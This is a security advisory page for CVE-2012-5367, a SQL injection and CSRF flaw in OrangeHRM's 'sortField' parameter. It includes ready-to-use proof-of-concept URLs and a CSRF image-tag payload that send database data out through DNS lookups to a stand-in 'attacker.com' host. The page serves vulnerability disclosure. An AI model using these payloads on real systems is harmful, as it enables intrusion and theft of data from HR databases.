Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs SecuriTeam™ in Your Inbox   E-mail this CVE-2012-5367 to a friend New vulnerability? New tool? Tell us	CVE-2012-5367 OrangeHRM SQL Injection Vulnerability     Credit: The original article can be found at: https://www.htbridge.com/advisory/HTB23119 Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    CVE-2012-5367 Details Check for CVE-2012-5367 Vulnerability Assessment and Management. Automated Pen Testing for 50 to 50,000 nodes beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * OrangeHRM 2.7.1-rc.1 and prior A SQL injection vulnerability has been discovered in OrangeHRM, which could be exploited to alter SQL requests to the application's database. 1) SQL Injection Vulnerability in Orange HRM: CVE-2012-5367 The vulnerability was discovered in the "/symfony/web/index.php" script while handling the "sortField" HTTP GET parameter. Successful exploitation of this vulnerability requires administrative privileges, however it can be exploited by a non-authenticated user via CSRF vector, as the above-mentioned script is also vulnerable to CSRF attack. The vulnerability could be triggered by accessing the following URIs: /symfony/web/index.php/admin/viewCustomers /symfony/web/index.php/admin/viewPayGrades /symfony/web/index.php/admin/viewPayGrades The PoC codes below are based on DNS Exfiltration technique and can be used in cases when application's database is hosted on a Windows system. The PoCs will send a DNS request demanding IP addess for `version()` (or any other sensitive information from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker): 1.1 http://[host]/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) The following PoC demonstrates exploitation of the vulnerability via CSRF vector: <img src="http://[host]/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))"> 1.2 http://[host]/symfony/web/index.php/admin/viewPayGrades?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) 1.3 http://[host]/symfony/web/index.php/admin/viewSystemUsers?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) CVE Information: CVE-2012-5367 Disclosure Timeline: Vendor Notification: October 10, 2012 Public Disclosure: October 31, 2012  Comments on CVE-2012-5367:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®